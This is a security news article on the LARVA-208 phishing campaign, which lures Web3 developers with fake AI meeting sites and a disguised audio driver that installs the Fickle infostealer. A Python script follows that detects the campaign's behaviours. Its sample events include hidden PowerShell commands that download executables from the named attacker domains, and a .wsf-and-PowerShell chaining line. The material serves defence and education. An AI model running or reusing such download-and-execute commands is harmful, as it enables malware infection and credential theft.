New Web3 Phishing Scam Uses Fake AI Platforms to Steal Credentials
The threat actor group LARVA-208, notorious for phishing attacks and social engineering against English-speaking IT staff, has pivoted to targeting Web3 developers.
Employing spearphishing links (T1566.002), the group lures victims with fabricated job offers or portfolio review requests, directing them to counterfeit AI workspace platforms.
These deceptive sites, such as the domain norlax.ai (T1583.001), mimic legitimate services like Teampilot.ai to build credibility.
Phishing Targets Web3 Developers
Once engaged, victims receive unique invitation codes and emails, leading to simulated meeting environments where audio issues prompt the download of malware disguised as a Realtek HD Audio Driver (T1036.005).
Execution of this malicious file triggers an embedded PowerShell command (T1059.001) that connects to command-and-control (C2) servers (T1583.004), retrieving and deploying the Fickle infostealer.
This malware systematically exfiltrates sensitive data, including device names, hardware specifications, OS versions, geolocation via IP addresses, installed programs, running processes, and user credentials, transmitting it back to the attacker’s infrastructure (T1041).
LARVA-208 acquires its phishing and C2 domains through FFv2’s bulletproof hosting services, often shared with the Luminous Mantis group, leading to attribution overlaps in the cybersecurity community.
The campaign’s ingenuity lies in two primary infection vectors. In the first, attackers distribute meeting links on social platforms like X (formerly Twitter) and Telegram to developers interested in blockchain and Web3 topics, framing them as interview opportunities.
The second exploits job applications on platforms like Remote3.co for Crypto Analyst roles; here, initial legitimate Google Meet sessions transition to sharing malicious Norlax AI links via chat, circumventing platform warnings against suspicious downloads.

Upon joining the fake call, victims encounter engineered audio driver errors, prompting the download from audiorealtek.com’s /getfile.php endpoint.
The installer, while displaying a benign interface, covertly executes PowerShell from setup.dll (T1204.002), fetching Fickle from C2 domains like cjhsbam.com.
Evolution of Tactics
This operation marks an evolution from LARVA-208’s prior methods, which involved tricking victims into downloading .LNK files that masqueraded as legitimate Windows Script Files (e.g., manage-bde.wsf) but appended hidden PowerShell commands using the ampersand operator to download payloads from servers like bitacid.net.
Now, data exfiltration leverages text storage sites such as Filebin (T1567.003) for record-keeping, while key victim details (OS, username, IP, geolocation, and antivirus information) are relayed to notify.php on C2 servers via web protocols (T1071.001).
According to Catalyst Report, in advanced setups, collected intelligence is uploaded to actor-controlled SilentPrism servers for real-time monitoring.
The campaign underscores LARVA-208’s adaptation to emerging trends, weaponizing AI tools to exploit Web3 developers’ trust in collaborative platforms.
By harvesting cryptocurrency wallets, development credentials, and project data, the group shifts from ransomware-focused monetization to data resale on illicit markets.
This highlights vulnerabilities in high-value environments, where traditional defenses falter against socially engineered infostealers like Fickle.
Cybersecurity experts recommend verifying domain authenticity, avoiding unsolicited downloads, and employing endpoint detection for PowerShell anomalies to mitigate such threats.
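As an added illustration of that last recommendation (example code written for this page, not from the article or from Catalyst), the following Python flags process-creation events that match the behaviours described above: PowerShell launched by a binary run from a user-writable folder, hidden or encoded PowerShell invocations, command lines that reach the domains named in this article, and a .wsf command chained to PowerShell with the ampersand operator. The log events are constructed samples, and the folder heuristic is an assumption.

```python
import re

# Domains named in the article; treated as a watch list for this example.
WATCHLIST_DOMAINS = {"norlax.ai", "audiorealtek.com", "cjhsbam.com", "bitacid.net"}
# Assumption: binaries run from these folders should not be spawning PowerShell.
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\")
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
HIDDEN_OR_ENCODED_RE = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:c|nc|ncodedcommand)?\s)", re.I)
WSF_CHAIN_RE = re.compile(r"\.wsf\b[^&]*&\s*powershell", re.I)

# Constructed process-creation events (parent image, image, command line), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\dev\Downloads\RealtekHDAudioDriver.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr https://cjhsbam.com/f.exe -OutFile $env:TEMP\f.exe"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem ~\src"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c manage-bde.wsf & powershell -w hidden -c "iwr https://bitacid.net/p.exe"'},
    {"parent": r"C:\Users\dev\Downloads\node-setup.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i node.msi /qn"},
]

def classify(event):
    """Return the reasons a single process-creation event matches the campaign's behaviours."""
    reasons = []
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    is_ps = image.endswith(("\\powershell.exe", "\\pwsh.exe"))
    if is_ps and any(folder in parent for folder in USER_WRITABLE):
        reasons.append("powershell spawned by a binary run from a user-writable folder")
    if is_ps and HIDDEN_OR_ENCODED_RE.search(cmd):
        reasons.append("hidden or encoded powershell invocation")
    for host in DOMAIN_RE.findall(cmd):
        if host.lower() in WATCHLIST_DOMAINS:
            reasons.append(f"contacts watch-listed domain {host.lower()}")
    if WSF_CHAIN_RE.search(cmd):
        reasons.append(".wsf command chained to powershell with '&'")
    return reasons

def detect(events):
    """Return (index, reasons) for every event that triggered at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```

On the constructed samples, events 0 and 2 are flagged while the routine PowerShell session and the MSI install are not; in production the same rules would be fed from Sysmon Event ID 1 or EDR process telemetry.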